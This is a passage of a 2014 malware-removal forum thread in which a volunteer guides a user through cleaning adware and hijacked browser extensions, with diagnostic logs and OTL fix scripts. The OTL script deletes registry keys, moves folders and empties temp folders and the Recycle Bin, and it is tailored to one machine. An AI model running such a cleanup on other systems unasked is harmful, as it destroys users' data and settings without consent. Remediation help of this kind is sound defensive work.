[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2011/11/26 10:15:37 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\982D4
[2013/12/26 18:09:24 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Ableton
[2012/05/28 23:13:46 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\ActiveState
[2013/09/26 20:06:48 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Ambient Design
[2014/01/04 18:13:56 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Audacity
[2013/09/10 16:07:49 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Autodesk
[2013/02/11 20:22:37 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Avid
[2011/11/26 05:38:25 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\BhhhTXXqjUCeIrz
[2012/06/07 19:23:09 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Blender Foundation
[2012/12/16 00:21:46 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Bloody Trapland Demo
[2011/12/18 16:04:38 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1
[2013/09/07 15:13:17 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\com.amazon.music.uploader
[2013/01/22 00:43:42 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\ConverterLite
[2014/01/04 12:11:29 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Dropbox
[2012/05/20 13:20:19 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\E4F98
[2013/01/11 22:45:11 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\gd.sos.McPixel
[2011/03/13 21:39:39 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\GetRightToGo
[2012/05/30 21:30:30 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Hex-Rays
[2013/03/19 16:04:17 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Lenovo
[2013/08/31 21:16:10 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\LSC
[2012/02/28 20:07:34 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\MakeMusic
[2012/01/16 18:40:36 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\MusE
[2011/11/26 10:15:37 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\NibbFF3pnG5aH6W
[2012/03/12 02:27:33 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Oberon Media
[2011/02/24 18:08:22 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\ooVoo Details
[2011/12/18 17:40:18 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\OpenOffice.org
[2011/11/26 05:38:27 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\oxxPP0ucS1ib3oG
[2010/11/05 20:31:26 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\PlayFirst
[2011/05/18 20:15:14 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\progeSOFT
[2012/07/12 15:08:46 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\PunkBuster
[2013/03/15 18:19:51 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Recordpad
[2012/04/10 12:58:25 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Rovio
[2012/04/03 21:48:38 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Scoregasm
[2013/03/20 20:27:50 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\SoftGrid Client
[2011/11/06 18:10:22 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Synthesia
[2012/05/30 19:42:23 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\timtux
[2010/10/31 20:25:44 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\TP
[2011/11/11 09:25:47 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Ubisoft
[2012/09/30 18:06:42 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Unity
[2011/07/30 23:15:12 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Utherverse
[2014/01/02 01:11:57 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\uTorrent
[2011/07/30 14:12:40 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\VertexDispenser
[2011/11/26 05:50:51 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\W2oobbF4pmG5QJd
[2012/04/09 21:19:05 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Waveform
[2010/11/28 15:21:46 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\Windows Live Writer
[2011/11/26 05:38:39 | 000,000,000 | ---D | M] -- C:\Users\Bri\AppData\Roaming\XvD2oF4pHsJ7d
 
========== Purity Check ==========
 
 
 
< End of report >
 
 
Thank you!

"Nothing says sausage like sausage!"


#6 Noviciate

Noviciate

  • Malware Response Team
  • 5,277 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Numpty HQ
  • Local time:08:37 PM

Posted 06 January 2014 - 02:35 PM

Good evening. :)

Can you tell me how long you have had this nasty and what, if any, applications you installed prior to becoming infected.


So long, and thanks for all the fish.

 

 


#7 SpaciousSpace

SpaciousSpace
  • Topic Starter

  • Members
  • 43 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Washington
  • Local time:12:37 PM

Posted 06 January 2014 - 08:20 PM

I've had it for about a week. I had recently installed Ableton (a music making software) directly from the website, as well as the chromecast app for my computer to hook up to my tv. Other than that, I haven't done a lot. 

 

As a side note, I've started getting completely different pop up windows. It's normally right after I start up the browser and click something on the page. It doesn't even have to be a link, it could be blank space and it opens a new page. Most of the time the content doesn't load, but it's been happening more frequently for the past two days.

 

And thank you so much for your help. I really appreciate it. :)


"Nothing says sausage like sausage!"


#8 SpaciousSpace

SpaciousSpace
  • Topic Starter

  • Members
  • 43 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Washington
  • Local time:12:37 PM

Posted 06 January 2014 - 08:29 PM

Attached File  popup.png   131.3KB   0 downloadsAs an example of that, right after I posted the last post and clicked off to get the cursor off the page, it popped this up.


"Nothing says sausage like sausage!"


#9 Noviciate

Noviciate

  • Malware Response Team
  • 5,277 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Numpty HQ
  • Local time:08:37 PM

Posted 07 January 2014 - 03:00 PM

Good evening. :)

Please download SystemLook by jpshortstuff from one of the links below and save it to your Desktop:
 

  • Linky #1
  • Linky #2
     
  • Double-click SystemLook.exe to run it.
  • Copy the contents of the following codebox into the main textfield:

    :dir
    C:\ProgramData\ShoPDroop/s
    C:\ProgramData\ehbflkekalelehfndkkdnopooeaopkmk/s
    C:\Users\Bri\AppData\Local\Packages/s
    C:\ProgramData\3e010479f616da2d/s
    C:\ProgramData\DiggiCoauPOnu/s
    C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions/s
    C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged/s
    
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan - the log can also be found on your Desktop entitled SystemLook.txt
  • Please post the contents of this log in your next reply.

 

 


So long, and thanks for all the fish.

 

 


#10 SpaciousSpace

SpaciousSpace
  • Topic Starter

  • Members
  • 43 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Washington
  • Local time:12:37 PM

Posted 08 January 2014 - 01:10 AM

SystemLook 30.07.11 by jpshortstuff
Log created at 22:09 on 07/01/2014 by Bri
Administrator - Elevation successful
 
========== dir ==========
 
C:\ProgramData\ShoPDroop - Parameters: "/s"
 
---Files---
None found.
 
No folders found.
 
C:\ProgramData\ehbflkekalelehfndkkdnopooeaopkmk - Parameters: "/s"
 
---Files---
background.html --a---- 143 bytes [04:40 30/12/2013] [04:40 30/12/2013]
content.js --a---- 144 bytes [04:40 30/12/2013] [04:40 30/12/2013]
jLz_q2.js --a---- 6173 bytes [04:40 30/12/2013] [04:40 30/12/2013]
lsdb.js --a---- 531 bytes [04:40 30/12/2013] [04:40 30/12/2013]
manifest.json --a---- 501 bytes [04:40 30/12/2013] [04:40 30/12/2013]
 
No folders found.
 
C:\Users\Bri\AppData\Local\Packages - Parameters: "/s"
 
---Files---
None found.
 
C:\Users\Bri\AppData\Local\Packages\windows_ie_ac_001 d------ [04:40 30/12/2013]
 
C:\Users\Bri\AppData\Local\Packages\windows_ie_ac_001\AC d------ [04:40 30/12/2013]
 
C:\Users\Bri\AppData\Local\Packages\windows_ie_ac_001\AC\{7058F24B-B35F-07E3-9543-C948F3779BB4} d------ [04:40 30/12/2013]
DiggiCoauPOnu.2.7.dat --a---- 144 bytes [04:40 30/12/2013] [04:40 30/12/2013]
 
C:\Users\Bri\AppData\Local\Packages\windows_ie_ac_001\AC\{89C7CA1A-3673-E8C9-3080-80CD59E3C43D} d------ [04:40 30/12/2013]
ShoPDroop.2.7.dat --a---- 144 bytes [04:40 30/12/2013] [04:40 30/12/2013]
 
C:\ProgramData\3e010479f616da2d - Parameters: "/s"
 
---Files---
22c3997ee7059bcb7ccef129aa8f8fa6.ini --a---- 826 bytes [04:40 30/12/2013] [04:40 30/12/2013]
91edd5c0e4a2c4a47ccef129aa8f8fa6.ini --a---- 818 bytes [04:40 30/12/2013] [04:40 30/12/2013]
{B6D700D3-3D0D-FEEB-D675-2CE78F9EC5D6} --a---- 822 bytes [09:38 02/01/2014] [09:38 02/01/2014]
{CE94DD89-7404-B4B9-E713-E55CC0AB6C3B} --a---- 822 bytes [09:38 02/01/2014] [09:38 02/01/2014]
 
No folders found.
 
C:\ProgramData\DiggiCoauPOnu - Parameters: "/s"
 
---Files---
None found.
 
No folders found.
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions - Parameters: "/s"
 
---Files---
None found.
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged d------ [04:39 30/12/2013]
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\6zag8r5m@guyo-eiou.edu d------ [04:39 30/12/2013]
bootstrap.js --a---- 2515 bytes [04:39 30/12/2013] [04:39 30/12/2013]
chrome.manifest --a---- 22 bytes [04:39 30/12/2013] [04:39 30/12/2013]
install.rdf --a---- 609 bytes [04:39 30/12/2013] [04:39 30/12/2013]
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\6zag8r5m@guyo-eiou.edu\content d------ [04:39 30/12/2013]
bg.js --a---- 8299 bytes [04:39 30/12/2013] [04:39 30/12/2013]
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\dtujhi@oondee.com d------ [04:40 30/12/2013]
bootstrap.js --a---- 2515 bytes [04:40 30/12/2013] [04:40 30/12/2013]
chrome.manifest --a---- 25 bytes [04:40 30/12/2013] [04:40 30/12/2013]
install.rdf --a---- 600 bytes [04:40 30/12/2013] [04:40 30/12/2013]
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\dtujhi@oondee.com\content d------ [04:40 30/12/2013]
bg.js --a---- 8336 bytes [04:40 30/12/2013] [04:40 30/12/2013]
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged - Parameters: "/s"
 
---Files---
None found.
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\6zag8r5m@guyo-eiou.edu d------ [04:39 30/12/2013]
bootstrap.js --a---- 2515 bytes [04:39 30/12/2013] [04:39 30/12/2013]
chrome.manifest --a---- 22 bytes [04:39 30/12/2013] [04:39 30/12/2013]
install.rdf --a---- 609 bytes [04:39 30/12/2013] [04:39 30/12/2013]
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\6zag8r5m@guyo-eiou.edu\content d------ [04:39 30/12/2013]
bg.js --a---- 8299 bytes [04:39 30/12/2013] [04:39 30/12/2013]
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\dtujhi@oondee.com d------ [04:40 30/12/2013]
bootstrap.js --a---- 2515 bytes [04:40 30/12/2013] [04:40 30/12/2013]
chrome.manifest --a---- 25 bytes [04:40 30/12/2013] [04:40 30/12/2013]
install.rdf --a---- 600 bytes [04:40 30/12/2013] [04:40 30/12/2013]
 
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\dtujhi@oondee.com\content d------ [04:40 30/12/2013]
bg.js --a---- 8336 bytes [04:40 30/12/2013] [04:40 30/12/2013]
 
-= EOF =-

"Nothing says sausage like sausage!"


#11 Noviciate

Noviciate

  • Malware Response Team
  • 5,277 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Numpty HQ
  • Local time:08:37 PM

Posted 08 January 2014 - 03:33 PM

Good evening. :)

 

Run OTL.exe.
 

  • Copy and paste the following bold text into the Custom Scans/Fixes box at the bottom:

    :OTL
    IE - HKLM\..\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}: "URL" = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3220468
    IE - HKCU\..\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}: "URL" = http://searchab.com/?aff=7&uid=27f466ef-5c80-11e2-b6e3-89d437f1aa2f&q={searchTerms}
    IE - HKCU\..\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}: "URL" = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3220468
    FF - prefs.js..browser.startup.homepage: "http://searchab.com/?aff=7&uid=27f466ef-5c80-11e2-b6e3-89d437f1aa2f"
    O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - No CLSID value found.
    O4 - HKCU..\Run: [Desura] C:\Program Files (x86)\Desura\desura.exe -autostart File not found
    O18:64bit: - Protocol\Handler\livecall - No CLSID value found
    O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
    O18:64bit: - Protocol\Handler\msnim - No CLSID value found
    O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
    O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
    O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
    O18 - Protocol\Handler\gopher - No CLSID value found

    :Files
    ipconfig /flushdns /c
    C:\ProgramData\ShoPDroop
    C:\ProgramData\ehbflkekalelehfndkkdnopooeaopkmk
    C:\Users\Bri\AppData\Local\Packages
    C:\ProgramData\3e010479f616da2d
    C:\ProgramData\DiggiCoauPOnu
    C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged

    :Commands
    [purity]
    [resethosts]
    [emptytemp]
    [EMPTYFLASH]
    [CREATERESTOREPOINT]
    [Reboot]

     
  • Click the Run Fix button at the top.
  • Let the program run until it has completed and then reboot the PC when it is done.

Please let me have a copy of the log that appears once OTL has completed it's run.

Note: Copies of the logs can be found in the  C:\_OTL\MovedFiles folder - open the newest .log file present, and copy/paste the contents of that document back here in your next post. The name of the log will in the following format: xxxxxxxx_xxxxxx. x representing the month, date, year and time the log was created. Eg: 03062009_170403

 

 

 

Will you also let me know how the PC is behaving now.


So long, and thanks for all the fish.

 

 


#12 SpaciousSpace

SpaciousSpace
  • Topic Starter

  • Members
  • 43 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Washington
  • Local time:12:37 PM

Posted 08 January 2014 - 08:27 PM

The green symbols are gone, Youtube plays without ads now, and I see no sign of the virus! :)

I also found out that it had hijacked my email address and was sending out emails with spam in them. Glad it's gone. Thank you so much for your help!

 

All processes killed
========== OTL ==========
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{afdbddaa-5d3f-42ee-b79c-185a7020515b}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{afdbddaa-5d3f-42ee-b79c-185a7020515b}\ not found.
Prefs.js: "http://searchab.com/?aff=7&uid=27f466ef-5c80-11e2-b6e3-89d437f1aa2f" removed from browser.startup.homepage
Registry value HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{D4027C7F-154A-4066-A1AD-4243D8127440} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D4027C7F-154A-4066-A1AD-4243D8127440}\ not found.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\Desura deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\livecall\ deleted successfully.
File Protocol\Handler\livecall - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-help\ deleted successfully.
File Protocol\Handler\ms-help - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\msnim\ deleted successfully.
File Protocol\Handler\msnim - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\skype4com\ deleted successfully.
File Protocol\Handler\skype4com - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\wlmailhtml\ deleted successfully.
File Protocol\Handler\wlmailhtml - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\wlpg\ deleted successfully.
File Protocol\Handler\wlpg - No CLSID value found not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\gopher\ deleted successfully.
File Protocol\Handler\gopher - No CLSID value found not found.
========== FILES ==========
< ipconfig /flushdns /c >
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
C:\Users\Bri\Desktop\cmd.bat deleted successfully.
C:\Users\Bri\Desktop\cmd.txt deleted successfully.
C:\ProgramData\ShoPDroop folder moved successfully.
C:\ProgramData\ehbflkekalelehfndkkdnopooeaopkmk folder moved successfully.
C:\Users\Bri\AppData\Local\Packages\windows_ie_ac_001\AC\{89C7CA1A-3673-E8C9-3080-80CD59E3C43D} folder moved successfully.
C:\Users\Bri\AppData\Local\Packages\windows_ie_ac_001\AC\{7058F24B-B35F-07E3-9543-C948F3779BB4} folder moved successfully.
C:\Users\Bri\AppData\Local\Packages\windows_ie_ac_001\AC folder moved successfully.
C:\Users\Bri\AppData\Local\Packages\windows_ie_ac_001 folder moved successfully.
Folder move failed. C:\Users\Bri\AppData\Local\Packages scheduled to be moved on reboot.
C:\ProgramData\3e010479f616da2d folder moved successfully.
C:\ProgramData\DiggiCoauPOnu folder moved successfully.
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\dtujhi@oondee.com\content folder moved successfully.
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\dtujhi@oondee.com folder moved successfully.
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\6zag8r5m@guyo-eiou.edu\content folder moved successfully.
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged\6zag8r5m@guyo-eiou.edu folder moved successfully.
C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged folder moved successfully.
========== COMMANDS ==========
C:\windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully
 
[EMPTYTEMP]
 
User: All Users
 
User: Bri
->Temp folder emptied: 439399208 bytes
->Temporary Internet Files folder emptied: 110974454 bytes
->Java cache emptied: 6839349 bytes
->FireFox cache emptied: 593898582 bytes
->Google Chrome cache emptied: 241742958 bytes
->Apple Safari cache emptied: 18880512 bytes
->Flash cache emptied: 273897 bytes
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Flash cache emptied: 57472 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: Guest
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 487026 bytes
 
User: Public
->Temp folder emptied: 0 bytes
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 778789 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 588006602 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 64720 bytes
RecycleBin emptied: 2729243428 bytes
 
Total Files Cleaned = 4,512.00 mb
 
 
[EMPTYFLASH]
 
User: All Users
 
User: Bri
->Flash cache emptied: 0 bytes
 
User: Default
->Flash cache emptied: 0 bytes
 
User: Default User
->Flash cache emptied: 0 bytes
 
User: Guest
 
User: Public
 
Total Flash Files Cleaned = 0.00 mb
 
Restore point Set: OTL Restore Point
 
OTL by OldTimer - Version 3.2.69.0 log created on 01082014_164057
 
Files\Folders moved on Reboot...
C:\Users\Bri\AppData\Local\Packages folder moved successfully.
C:\Users\Bri\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.
 
PendingFileRenameOperations files...
 
Registry entries deleted on Reboot...

"Nothing says sausage like sausage!"


#13 Noviciate

Noviciate

  • Malware Response Team
  • 5,277 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Numpty HQ
  • Local time:08:37 PM

Posted 09 January 2014 - 03:04 PM

Good evening. :)

Good news. I'd like you to run the following, more as a final check than anything else, just in case there are any little leftovers to deal with:

 

Pay a visit to the ESET Online Scanner.

  • Click the Run ESET Online Scanner button.
  • If you are using any other browser than IE, you will be prompted to download and run esetsmartinstaller_enu.exe and the scan will run from within the window that the executable opens.
  • Regardless of which browser you are using, you will be shown some terms and conditions and you will need to accept these to continue.
  • If you are running IE for this scan you will then be prompted to allow an ActiveX component to be downloaded, unless you already have it installed, and the scan will run inside IE.
  • When you see the Computer Scan Settings window, you will need to make the following changes:

    • UNCHECK Remove found threats - this is important.
    • Check Scan archives
    • Click on Advanced settings
    • Check Scan for potentially unsafe applications
  • Once ready, click Start to begin - not a surprise really!
  • The anti-virus definitions will now be downloaded, so don't forget to allow them through your firewall if prompted.
  • The above will take a little time, so now is a good time to fire up the kettle and open the biccies.
  • Once the scan has completed you will be shown the results - assuming that the scanner has found anything.
  • Click List of found threats and then Export to text file... and save the log somewhere convenient.
  • You can then close out the scanner - don't bother uninstalling it as you may need to use it again.
  • Please post the contents of this file in your next reply, or let me know that nothing was identified.


Will you also throw in a fresh DDS log.


So long, and thanks for all the fish.

 

 


#14 SpaciousSpace

SpaciousSpace
  • Topic Starter

  • Members
  • 43 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Washington
  • Local time:12:37 PM

Posted 10 January 2014 - 08:25 PM

C:\ProgramData\Tarma Installer\{361E80BE-388B-4270-BF54-A10C2B756504}\_Setupx.dll a variant of Win32/Adware.Yontoo.B application
C:\ProgramData\Tarma Installer\{DE3B7BF9-0770-4104-BC0B-B1CCCCE2F053}\_Setupx.dll a variant of Win32/Adware.Yontoo.B application
C:\Users\All Users\Tarma Installer\{361E80BE-388B-4270-BF54-A10C2B756504}\_Setupx.dll a variant of Win32/Adware.Yontoo.B application
C:\Users\All Users\Tarma Installer\{DE3B7BF9-0770-4104-BC0B-B1CCCCE2F053}\_Setupx.dll a variant of Win32/Adware.Yontoo.B application
C:\Users\Bri\Downloads\FreeStudio.exe Win32/OpenCandy application
C:\Users\Bri\Downloads\FreeYouTubeDownload.exe Win32/OpenCandy application
C:\Users\Bri\Downloads\utorrent (1).exe a variant of Win32/Bunndle application
C:\Users\Bri\Downloads\utorrent (2).exe a variant of Win32/Bunndle application
C:\Users\Bri\Downloads\Other Stuff\PS3 Emulator 1.1.6.rar a variant of MSIL/Hoax.Agent.NAD application
C:\Users\Bri\Downloads\Set-Ups\FreeYouTubeToiPodConverter.exe Win32/OpenCandy application
 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 8.0.7600.17267  BrowserJavaVersion: 10.7.2
Run by Bri at 17:15:43 on 2014-01-10
Microsoft Windows 7 Home Premium   6.1.7600.0.1252.1.1033.18.3895.1317 [GMT -8:00]
.
AV: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {ADA629C7-7F48-5689-624A-3B76997E0892}
SP: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {16C7C823-5972-5907-58FA-0004E2F9422F}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall *Enabled* {959DA8E2-3527-57D1-4915-924367AD4FE9}
.
============== Running Processes ===============
.
C:\windows\system32\lsm.exe
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k RPCSS
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\svchost.exe -k LocalService
C:\windows\system32\svchost.exe -k NetworkService
C:\windows\System32\spoolsv.exe
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\windows\system32\rundll32.exe
C:\windows\SysWOW64\rundll32.exe
C:\windows\SysWOW64\svchost.exe -k hpdevmgmt
C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe
C:\Program Files\McAfee\MSC\McAPExe.exe
C:\windows\system32\mfevtps.exe
C:\windows\System32\svchost.exe -k HPZ12
C:\windows\SysWOW64\nlssrv32.exe
C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe
C:\windows\system32\rundll32.exe
C:\windows\system32\rundll32.exe
C:\windows\SysWOW64\rundll32.exe
C:\windows\System32\svchost.exe -k HPZ12
C:\windows\SysWOW64\PnkBstrA.exe
C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
C:\windows\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
C:\windows\system32\taskhost.exe
C:\windows\system32\Dwm.exe
C:\windows\Explorer.EXE
C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
C:\windows\system32\SearchIndexer.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeyStudio.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Program Files (x86)\Lenovo\Energy Management\utility.exe
C:\windows\system32\svchost.exe -k HPService
C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent64.exe
C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeySupport.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Users\Bri\AppData\Local\Google\Update\GoogleUpdate.exe
